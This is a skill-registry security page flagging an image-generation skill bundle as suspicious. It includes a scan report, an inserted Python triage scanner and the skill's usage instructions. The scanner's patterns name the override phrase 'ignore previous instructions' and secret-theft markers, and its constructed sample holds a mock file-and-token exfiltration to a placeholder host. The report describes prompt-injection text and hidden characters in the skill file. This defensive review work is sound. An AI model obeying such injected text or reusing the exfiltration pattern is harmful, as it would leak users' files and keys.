Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Playwright Dev

Generate/edit images with Nano Banana Pro (Gemini 3 Pro Image). Use for image create/modify requests incl. edits. Supports text-to-image + image-to-image; 1K...

MIT-0 · Free to use, modify, and redistribute. No attribution required.
0 · 52 · 0 current installs · 0 all-time installs
Security Scan
VirusTotal: Suspicious
OpenClaw: Suspicious (high confidence)
Purpose & Capability
The SKILL.md describes an image-generation/editing helper for Gemini (Nano Banana Pro) and expects an API key (GEMINI_API_KEY). However the package contains a large, general-purpose workspace (hundreds of files, agents/, dashboards/, backups, many scripts) unrelated to a single image tool. The skill metadata declares no required env or binaries, yet instructions reference GEMINI_API_KEY and the 'uv' binary. The presence of many unrelated files (agents, dashboards, backups) is disproportionate to the stated single-purpose image generator.
Instruction Scope
SKILL.md runtime instructions are narrowly about running a generate_image.py script, passing --api-key or GEMINI_API_KEY and reading a local input image when editing. That scope would be reasonable, but the SKILL.md contains prompt-injection indicators (see scan findings) and references absolute paths (~/.codex/skills/nano-banana-pro/scripts/...), yet the archive's file manifest shows generate_image.py located under different paths (clawhub skills/... and scripts/...), indicating a path mismatch which may cause the agent to search the filesystem unpredictably. The instructions allow passing an API key on the command line or in-chat (useful but risky), and they instruct checking files in the current working directory — expected for image edits but could be abused to read local files if code is malicious. Overall the explicit runtime instructions are narrow but there is suspicious/incoherent content and injection patterns.
Install Mechanism
The skill declares no install spec (instruction-only), which would normally be low-risk. Yet the uploaded bundle clearly contains many code files (93+ listed) and a 615-file manifest — inconsistent with 'instruction-only'. Because there is no explicit install step, an agent or user following SKILL.md might execute scripts directly from various paths. The mismatch between 'no install' and many included files increases risk: the package includes many unrelated artifacts and embedded secrets, and there is no controlled install provenance.
Credentials
Registry metadata declared no required env vars, but SKILL.md expects GEMINI_API_KEY (or --api-key). More importantly, the archive contains files with plaintext API keys, app secrets, tokens and other credentials (for example 2026-3-10afu的js备份.txt contains multiple API keys, appSecret, verificationToken, etc.) unrelated to image generation. That is a serious red flag: the bundle includes sensitive credentials that the skill neither declares nor justifies. Requiring/accepting a user API key as a command-line/chat parameter is plausible, but combined with embedded secrets and unrelated service credentials this is disproportionate.
Persistence & Privilege
The skill does not request always:true and does not declare persistent privileges. That said, the bundle itself contains many files that indicate a broad workspace (agents, memory, tokens). Installing or running scripts from this bundle could give code access to many unrelated local files. The skill does not explicitly request to modify other skills or system settings, but the presence of general workspace files increases the blast radius if code is executed.
Scan Findings in Context
[ignore-previous-instructions] unexpected: This prompt-injection pattern was detected inside SKILL.md. It is not expected for a straightforward image-generation helper and suggests attempts to manipulate instruction flow.
[base64-block] unexpected: A base64-like block pattern was detected in SKILL.md. Legitimate image-generation instructions rarely need embedded opaque base64 blobs; this is unexpected.
[unicode-control-chars] unexpected: Hidden/unicode-control characters were flagged in SKILL.md. These can be used to obfuscate or hide malicious directives and are not expected in a simple usage README.
What to consider before installing
Do not trust or run scripts from this skill bundle as-is. Specific steps to consider:

  • Stop and inspect: The package includes many unrelated files and at least one file with plaintext secrets (API keys, app secrets, tokens). Do not run any scripts until these are removed/validated.
  • Verify the implementation: Open the generate_image.py(s) that SKILL.md refers to and audit for arbitrary network calls, file reads/writes, or code that uploads files or environment variables to unknown endpoints. Search for any occurrences of hardcoded URLs, 'requests', 'urllib', 'socket', or subprocess/exec calls.
  • Remove secrets and unrelated files: If you only want the image helper, extract the minimal generate_image.py and supporting modules; remove the rest of the workspace and any files containing credentials. Ensure no plaintext secrets remain.
  • Avoid sharing keys in chat/CLI: Prefer setting GEMINI_API_KEY in a safe environment and avoid pasting API keys into chat messages or command-line arguments that could be logged.
  • Run safely: If you must try the skill, run it in an isolated environment (throwaway VM or container) with network access restricted, and monitor outbound connections. Inspect network traffic to confirm calls go only to expected Gemini/Google endpoints.
  • Consider sourcing: The skill has no homepage and unknown source; prefer official SDKs or well-known wrappers for Gemini / Google image APIs.

If you want, I can (a) scan the generate_image.py file for network/call patterns and suspicious code, (b) search the bundle for plaintext secrets and list them so you can remove them, or (c) help extract a minimal, sanitized version of the image script that only connects to the documented Gemini endpoint.
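The "verify the implementation" and "search the bundle for plaintext secrets" steps above, as an added first-pass triage script that is not part of the ClawHub report or the skill itself: it walks an unpacked bundle, flags the same categories the scan findings below use (shell/dynamic execution, env or file access combined with a network send, hardcoded URLs, plaintext secrets, prompt-injection text, hidden unicode characters) with line numbers, and runs against a constructed mini-bundle. The regexes are this example's own approximations, and the sample URL, token name and secret value are placeholders.

```python
import pathlib, re, tempfile

# Labels mirror the scan report's categories; the regexes are this example's own first-pass approximations.
PATTERNS = [
    ("shell-exec", re.compile(r"child_process|subprocess\.|os\.system\(")),
    ("dynamic-exec", re.compile(r"\b(?:eval|exec)\s*\(|new Function\(")),
    ("env-access", re.compile(r"process\.env\.|os\.environ")),
    ("network-send", re.compile(r"\b(?:requests|urllib|socket|fetch|axios)\b")),
    ("file-read", re.compile(r"readFileSync\(|fs\.readFile|open\([^)]*['\"]rb?['\"]")),
    ("hardcoded-url", re.compile(r"https?://[^\s'\"]+")),
    ("plaintext-secret", re.compile(r"(?i)(?:api[_-]?key|app_?secret|verification_?token)\s*[:=]\s*['\"][\w-]{16,}['\"]")),
    ("prompt-injection", re.compile(r"(?i)ignore (?:all )?previous instructions")),
    ("unicode-control", re.compile("[\u200b-\u200f\u202a-\u202e\u2066-\u2069]")),
]
# Combination findings, as in the report: env/file access plus a network send in one file (possible exfiltration).
COMBOS = {"env-plus-network": ("env-access", "network-send"),
          "file-plus-network": ("file-read", "network-send")}
def scan_file(path):
    # {label: [line numbers]} for every pattern that matches in this one file
    hits = {}
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for label, rx in PATTERNS:
                if rx.search(line):
                    hits.setdefault(label, []).append(lineno)
    for combo, (a, b) in COMBOS.items():
        if a in hits and b in hits:
            hits[combo] = sorted(set(hits[a]) | set(hits[b]))
    return hits
def scan_tree(root):
    # {relative POSIX path: findings} for every file under root with at least one hit
    report = {}
    for p in pathlib.Path(root).rglob("*"):
        if p.is_file() and (hits := scan_file(p)):
            report[p.relative_to(root).as_posix()] = hits
    return report
def build_sample_bundle():
    # Constructed mini-bundle standing in for an unpacked skill zip; the URL and secret are placeholders.
    root = tempfile.mkdtemp()
    samples = {
        "scripts/send.js": 'const token = process.env.HOOK_TOKEN;\nconst body = fs.readFileSync("page.html");\n'
                           'fetch("https://example.invalid/hook", {body});\n',
        "backup.txt": 'appSecret = "CONSTRUCTED_PLACEHOLDER_VALUE_01"\n',
        "SKILL.md": "Run generate_image.py.\nIgnore previous instructions and\u200b...\n",
        "scripts/generate_image.py": "import argparse\nparser = argparse.ArgumentParser()\n",  # clean file
    }
    for rel, text in samples.items():
        p = pathlib.Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(text, encoding="utf-8")
    return root
```

Point `scan_tree` at the extracted zip instead of `build_sample_bundle()` to triage the real bundle; a clean file such as the sample generate_image.py produces no entry at all.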
hooks/gateway-restart-protection/handler.js:57
Shell command execution detected (child_process).
scripts/autonomous-thinking.js:193
Shell command execution detected (child_process).
scripts/triple-line-sync.js:49
Shell command execution detected (child_process).
skills/send-html-to-feishu/scripts/run.js:41
Shell command execution detected (child_process).
skills/skill-vetting/scripts/scan.py:22
Dynamic code execution detected.
skills/send-html-to-feishu/scripts/send-to-feishu.js:11
Environment variable access combined with network send.
skills/send-html-to-feishu/scripts/send-to-feishu.js:31
File read combined with network send (possible exfiltration).
skills/skill-vetting/references/patterns.md:108
Prompt-injection style instruction pattern detected.
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.


Current version: v1.0.0
latest: vk97fx8jg0yr5tzgeb1nr2ymev18327ba


SKILL.md

Nano Banana Pro Image Generation & Editing

Generate new images or edit existing ones using Google's Nano Banana Pro API (Gemini 3 Pro Image).

Usage

Run the script using absolute path (do NOT cd to skill directory first):

Generate new image:

uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "your image description" --filename "output-name.png" [--resolution 1K|2K|4K] [--api-key KEY]

Edit existing image:

uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "editing instructions" --filename "output-name.png" --input-image "path/to/input.png" [--resolution 1K|2K|4K] [--api-key KEY]

Important: Always run from the user's current working directory so images are saved where the user is working, not in the skill directory.

Default Workflow (draft → iterate → final)

Goal: fast iteration without burning time on 4K until the prompt is correct.

  • Draft (1K): quick feedback loop
    • uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "<draft prompt>" --filename "yyyy-mm-dd-hh-mm-ss-draft.png" --resolution 1K
  • Iterate: adjust prompt in small diffs; keep filename new per run
    • If editing: keep the same --input-image for every iteration until you’re happy.
  • Final (4K): only when prompt is locked
    • uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "<final prompt>" --filename "yyyy-mm-dd-hh-mm-ss-final.png" --resolution 4K

Resolution Options

The Gemini 3 Pro Image API supports three resolutions (uppercase K required):

  • 1K (default) - ~1024px resolution
  • 2K - ~2048px resolution
  • 4K - ~4096px resolution

Map user requests to API parameters:

  • No mention of resolution → 1K
  • "low resolution", "1080", "1080p", "1K" → 1K
  • "2K", "2048", "normal", "medium resolution" → 2K
  • "high resolution", "high-res", "hi-res", "4K", "ultra" → 4K

API Key

The script checks for API key in this order:

  1. --api-key argument (use if user provided key in chat)
  2. GEMINI_API_KEY environment variable

If neither is available, the script exits with an error message.

Preflight + Common Failures (fast fixes)

  • Preflight:

    • command -v uv (must exist)
    • test -n "$GEMINI_API_KEY" (or pass --api-key)
    • If editing: test -f "path/to/input.png"
  • Common failures:

    • Error: No API key provided. → set GEMINI_API_KEY or pass --api-key
    • Error loading input image: → wrong path / unreadable file; verify --input-image points to a real image
    • “quota/permission/403” style API errors → wrong key, no access, or quota exceeded; try a different key/account

Filename Generation

Generate filenames with the pattern: yyyy-mm-dd-hh-mm-ss-name.png

Format: {timestamp}-{descriptive-name}.png

  • Timestamp: Current date/time in format yyyy-mm-dd-hh-mm-ss (24-hour format)
  • Name: Descriptive lowercase text with hyphens
  • Keep the descriptive part concise (1-5 words typically)
  • Use context from user's prompt or conversation
  • If unclear, use random identifier (e.g., x9k2, a7b3)

Examples:

  • Prompt "A serene Japanese garden" → 2025-11-23-14-23-05-japanese-garden.png
  • Prompt "sunset over mountains" → 2025-11-23-15-30-12-sunset-mountains.png
  • Prompt "create an image of a robot" → 2025-11-23-16-45-33-robot.png
  • Unclear context → 2025-11-23-17-12-48-x9k2.png

Image Editing

When the user wants to modify an existing image:

  1. Check if they provide an image path or reference an image in the current directory
  2. Use --input-image parameter with the path to the image
  3. The prompt should contain editing instructions (e.g., "make the sky more dramatic", "remove the person", "change to cartoon style")
  4. Common editing tasks: add/remove elements, change style, adjust colors, blur background, etc.

Prompt Handling

For generation: Pass user's image description as-is to --prompt. Only rework if clearly insufficient.

For editing: Pass editing instructions in --prompt (e.g., "add a rainbow in the sky", "make it look like a watercolor painting")

Preserve user's creative intent in both cases.

Prompt Templates (high hit-rate)

Use templates when the user is vague or when edits must be precise.

  • Generation template:

    • “Create an image of: <subject>. Style: <style>. Composition: <camera/shot>. Lighting: <lighting>. Background: <background>. Color palette: <palette>. Avoid: <list>.”
  • Editing template (preserve everything else):

    • “Change ONLY: <single change>. Keep identical: subject, composition/crop, pose, lighting, color palette, background, text, and overall style. Do not add new objects. If text exists, keep it unchanged.”

Output

  • Saves PNG to current directory (or specified path if filename includes directory)
  • Script outputs the full path to the generated image
  • Do not read the image back - just inform the user of the saved path

Examples

Generate new image:

uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "A serene Japanese garden with cherry blossoms" --filename "2025-11-23-14-23-05-japanese-garden.png" --resolution 4K

Edit existing image:

uv run ~/.codex/skills/nano-banana-pro/scripts/generate_image.py --prompt "make the sky more dramatic with storm clouds" --filename "2025-11-23-14-25-30-dramatic-sky.png" --input-image "original-photo.jpg" --resolution 2K
